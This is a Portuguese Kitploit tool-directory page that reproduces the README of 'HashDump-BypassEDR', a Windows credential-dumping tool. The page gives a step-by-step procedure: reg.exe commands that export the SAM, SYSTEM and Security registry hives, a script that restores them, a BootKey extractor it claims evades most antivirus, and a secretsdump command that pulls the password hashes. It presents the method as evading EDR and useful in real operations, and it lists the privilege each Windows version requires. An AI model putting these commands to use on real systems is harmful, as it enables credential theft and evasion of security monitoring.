Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
HashDump-BypassEDR — Windows绕过EDR实现DumpHash | Kitploit
Ferramentas/GitHubGitHub/aabysszg/hashdump-bypassedr
Password AttacksHash AnalysisIDS/IPS EvasionPost-ExploitationPenetration TestingRed Teaming
GitHubaabysszg/hashdump-bypassedr

HashDump-BypassEDR

Windows绕过EDR实现DumpHash

Ver Repositório
25132há 22 diasRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

HashDump-BypassEDR

1# Visão Geral do Projeto

Através da aplicação estendida do programa legítimo do sistema Reg.exe, contornamos habilmente o ponto de interceptação dos antivírus, alcançando o objetivo de contornar o EDR para realizar o DumpHash.

Com base em testes reais, este método é eficaz contra sistemas da série Windows, tem baixa dificuldade de operação e possui valor para uso em operações reais.

Artigos sobre aplicação prática deste projeto:

  • Como contornar o EDR e realizar o DumpHash – Blog da AabyssZG
  • Como contornar o EDR e realizar o DumpHash – Comunidade Nacional de Segurança do Ciberespaço

Após a publicação do artigo, não encontramos a mesma abordagem em comunidades nacionais e estrangeiras, e pensamos que fosse uma estreia mundial. Posteriormente, com base nos comentários dos fãs, descobrimos que essa abordagem já havia sido compartilhada anteriormente por um especialista no exterior: Dumping LSA secrets: a story about task decorrelation

O código-fonte e os Releases deste artigo já foram publicados no GitHub. Compartilhar não é fácil; se você achar útil, pode dar um Star. Muito obrigado!

2# Etapas Principais

2.1 Primeira Etapa: Exportar o arquivo reg

Na máquina de destino, execute o comando para exportar o arquivo .reg

root@kitploit:~
reg.exe export HKLM\SAM C:\Users\Public\sam.reg
reg.exe export HKLM\SYSTEM C:\Users\Public\system.reg
reg.exe export HKLM\Security C:\Users\Public\security.reg

2.2 Segunda Etapa: Restaurar os binários na máquina local

Baixe o arquivo .reg da primeira etapa para a máquina local e execute o script PowerShell RegReduction.ps1 deste projeto na máquina local para restaurar os arquivos binários.

root@kitploit:~
.\RegReduction.ps1

Observação: após baixar o script do GitHub, a codificação padrão é UTF-8; é necessário alterá-la para ANSI (GB2312) usando o Bloco de Notas para que o script seja executado corretamente.

powershell.png

2.3 Terceira Etapa: Obter a BootKey

Na máquina de destino, execute o executável BootKey.exe; o código-fonte é o arquivo BootKey.c deste projeto.

root@kitploit:~
BootKey.exe

BootKey.png

Teste de bypass de antivírus (2026.5.10): www.virustotal.com

Virustotal.png

2.4 Quarta Etapa: Obter os hashes com o secretsdump

root@kitploit:~
python secretsdump.py -sam SAM.hive -security SECURITY.hive -bootkey <目标机器的BootKey> LOCAL

HashOut.png

3# Explicação sobre Permissões

Este artigo envolve várias operações importantes; os passos centrais na máquina de destino são apenas dois:

  • Usar o comando reg.exe export para exportar o conteúdo crítico do registro;
  • Usar o BootKey.exe para exportar a BootKey do sistema.

Também foram realizados testes em diferentes sistemas, com os seguintes resultados:

  • Nos testes reais, em ambientes Win10, Win11 e Windows Server 2025, o uso do comando reg.exe export para exportar o registro requer privilégios de SYSTEM; já em ambientes Windows Server 2022 e inferiores, o uso do comando reg.exe export para exportar o registro requer apenas privilégios de administrador comum (sem necessidade de privilégios de SYSTEM). Se o arquivo exportado pelo comando reg.exe export tiver apenas 1KB, isso indica que as permissões são insuficientes.
  • Nos testes reais, o uso da ferramenta de extração BootKey.exe para exportar a BootKey não requer privilégios de administrador e, na prática, a maioria dos antivírus (todos os encontrados até agora) não o detecta.

🙏 4# Agradecimentos a todos os mestres

Stargazers

Stargazers repo roster for @AabyssZG/HashDump-BypassEDR

Forkers

Forkers repo roster for @AabyssZG/HashDump-BypassEDR

Star History

Star History Chart

Baixar ferramenta